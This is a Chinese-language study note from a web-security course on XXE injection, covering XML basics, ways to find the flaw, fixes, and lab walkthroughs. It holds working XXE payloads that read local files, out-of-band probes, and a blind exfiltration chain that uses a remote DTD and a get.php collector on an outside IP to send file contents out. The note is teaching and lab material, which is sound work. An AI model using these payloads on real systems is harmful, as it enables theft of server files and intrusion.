059-Web攻防-XXE安全&DTD实体&复现源码等

知识点

XML&XXE-传输-原理&探针&利用&玩法

XML&XXE-黑盒-JS&黑盒测试&类型修改

XML&XXE-白盒-CMS&PHPSHE&无回显

什么是XML?

XML 被设计为传输和存储数据,XML 文档结构包括 XML 声明、DTD 文档类型定义(可

选)、文档元素,其焦点是数据的内容,其把数据从 HTML 分离,是独立于软件和硬件的

信息传输工具。等同于 JSON 传输

XXE 漏洞 XML External Entity Injection

即 xml 外部实体注入漏洞,XXE 漏洞发生在应用程序解析 XML 输入时没禁止外部实体

的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网扫描、攻击内网等危

害。

XML 与 HTML 的主要差异:

XML 被设计为传输和存储数据,其焦点是数据的内容。

HTML 被设计用来显示数据,其焦点是数据的外观。

HTML 旨在显示信息 ,而 XML 旨在传输存储信息。

Example:网站的 xml 文件解析

  • 第一种为xml格式传输
  • 第二钟常规传输
  • 第三种为json传输

image-20250526193322113

image-20250526193500458

-XXE 黑盒发现漏洞:

1、获取得到 Content-Type 或数据类型为 xml 时,尝试 xml 语言 payload 进行测试

2、不管获取的 Content-Type 类型或数据传输类型,均可尝试修改后提交测试 xxe

3、XXE 不仅在数据传输上可能存在漏洞,同样在文件上传引用插件解析或预览也会造成

文件中的 XXE Payload 被执行

4、流量包里面对关键字进行筛选<?xml

-XXE 白盒发现:

1、可通过应用功能追踪代码定位审计

2、可通过脚本特定函数搜索定位审计

3、可通过伪协议玩法绕过相关修复等

XXE 修复防御方案:

-方案 1-禁用外部实体

PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf

=DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferenc

es(false);

Python:

from lxml import etreexmlData =

etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

—方案2-过滤用户提交的XML数据

过滤关键字:<!DOCTYPE 和<!ENTITY,或者 SYSTEM 和 PUBLIC

XML&XXE-传输-原理&探针&利用&玩法

参考:https://www.cnblogs.com/20175211lyz/p/11413335.html

1、读取文件:有回显

1
2
3
4
5
6
1、读取文件:
<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM  "file:///d:/1.txt">
]>
<user><username>&test;</username><password>Mikasa</password></user>

简单案例

  • 在本地搭建的xxe网站登录进行抓包
  • 修改请求 复制粘贴上面的代码 读取我D盘下事先准备好的文件1.txt
  • 读取成功
  • image-20250526200531608
  • image-20250526200750387
  • image-20250526200844186
  • image-20250526201224120

1.1、带外测试:无回显

1
2
3
4
5
6
<?xml version="1.0" ?>
<!DOCTYPE test [
    <!ENTITY % file SYSTEM "http://y80f9n.dnslog.cn">
    %file;
]>
<user><username>&send;</username><password>Mikasa</password></user>

简单案例

  • 修改代码 将上面的代码复制粘贴到请求包里面
  • image-20250526203637755
  • image-20250526203812084
  • image-20250526203836548

2、外部引用实体dtd:无回显

1
2
3
4
5
6
7
8
9
<?xml version="1.0" ?>
<!DOCTYPE test [
    <!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd">
    %file;
]>
<user><username>&send;</username><password>Mikasa</password></user>

evil2.dtd:
<!ENTITY send SYSTEM "file:///d:/e.txt">

简单案例

  • 在本地目录下面写好我们的text.txt将后缀修改为dtd文件内容如下
  • 将此文件放在www文件夹下面
  • 打开登录界面进行抓包

image-20250527102134810

image-20250526205918363

image-20250527102011574

问题:test.dtd为什么读取的是我本机上面的d盘下的1.txt而不是我虚拟机上面的

XXE 中的 file:// 是一个本地文件 URI 协议,表示访问当前操作系统本地的文件系统。

所以:文件路径是相对于“XML 解析器”运行所在的系统,而不是相对于 DTD 所在的服务器。

  • image-20250527103024461
  • 让 XML 在虚拟机中被解析:让你的服务程序(比如 DVWA、Java Web 服务、PHP)在虚拟机里运行,那 XXE 攻击读取的就是虚拟机里的文件。
  • 将虚拟机中的文件通过 HTTP 暴露出来<!ENTITY send SYSTEM "http://<虚拟机IP>:8081/1.txt">

3、无回显读文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/2.txt"> 
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
%remote;
%all;
]>
<root>&send;</root>


解释:
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/2.txt"> //定义一个外部实体 file,它的内容是本地 D 盘上的 2.txt 文件内容
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
//再定义一个实体 remote,告诉解析器去远程加载 test.dtd 文件。
%remote;//加载并执行 test.dtd 中的内容(这是关键,像 include 一样)
%all;//加载 test.dtd 中定义的 %all 实体(下一步会看到它的作用)。
]>
<root>&send;</root>//最终输出实体 send 的内容,它是在远程的 test.dtd 中间接定义的

test.dtd:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">
//这里定义了一个实体 %all,它的内容是再定义一个名叫 send 的实体。
这个 send 的值是一个远程 URL,它包含 %file;,也就是之前读取到的 d:/2.txt 文件内容
最终,&send; 会被替换为对这个 URL 的请求(比如 get.php?file=secret123),从而把敏感文件内容发送到攻击者服务器上。

get.php

<?php 
$data=$_GET['file'];
$myfile=fopen("file.txt","+w");
fwrite($myfile,$data);
fclose($myfile);
?>//这个脚本的作用是保存 XML 请求中泄露出来的文件内容

[目标机器解析 XML]

读取 file:///d:/2.txt 成为实体 file

从 http://47.94.236.117/test.dtd 加载恶意 DTD

test.dtd 定义 send → 包含敏感文件内容的 URL

XML 中出现 &send; → 向攻击者网站发出请求

get.php 接收数据并保存为 file.txt

简单案例

  • 本地目录下面创建2.txt内容如下文件里面的内容不能是中文 XML 解析器要求 URI 必须是符合标准格式的 ASCII 字符串
  • 在虚拟机本地目录下面写入文件test1.txt写完修改后缀为dtd并在目录下面写入get.php文件
  • 在登录页面访问抓包 将上面的代码复制到请求包里面
  • image-20250527111713073
  • image-20250527104806528
  • image-20250527105000362
  • image-20250527112324422
  • image-20250527112315089

黑盒测试:观察数据的格式

白盒测试:处理数据的函数和框架

4、其他玩法(协议)-见参考地址

参考:https://www.cnblogs.com/20175211lyz/p/11413335.html

当无回显时我们应该想到三个问题:

    1. 无漏洞
    2. 无回显
    3. payload有问题

XML&XXE-黑盒-JS&黑盒测试&类型修改

http://web.jarvisoj.com:9882/XXE 黑盒发现:
1、获取 Content-Type 或数据类型为 xml 时,尝试进行 xml 语言 payload 进行测试

2、不管获取的 Content-Type 类型或数据传输类型,均可尝试修改后提交测试 xxe流程:功能分析-前端提交-源码&抓包-构造 Paylod 测试更改请求数据格式:Content-Type

1
2
3
4
5
6
7
<?xml version="1.0" ?>
<!DOCTYPE ANY [
    <!ENTITY f SYSTEM "file:///d:/1.txt">
]>
<x>
	&f;
</x>

ML&XXE-白盒-CMS&PHPSHE&无回显

审计流程简单案例:

  1. 漏洞函数simplexml_load_string用来把 XML 字符串转换成一个可以操作的对象(类似数组)**,方便你读取或处理 XML 数据

  2. pe_getxml函数调用了漏洞函数右键 转到 申明和用力查看调用的地方

  3. wechat_getxml调用了pe_getxml

  4. notify_url 调用了wechat_getxml

  5. 访问Notify_url文件 抓包 出发wechat_getxml函数,构造payload测试 无回显 使用带外

  6. 先尝试读取文件,无回显后带外测试

    1
    2
    3
    4
    5
    6
    7
    <?xml version="1.0" ?>
    <!DOCTYPE ANY [
        <!ENTITY f SYSTEM "file:///d:/1.txt">
    ]>
    <x>
    	&f;
    </x>

    image-20250527141938067

    image-20250527142041550

    image-20250527142203116

    image-20250527142335009

    image-20250527142502209

    image-20250527142748506

    image-20250527144349772

    image-20250527144459795

    image-20250527145806368

    image-20250527145835056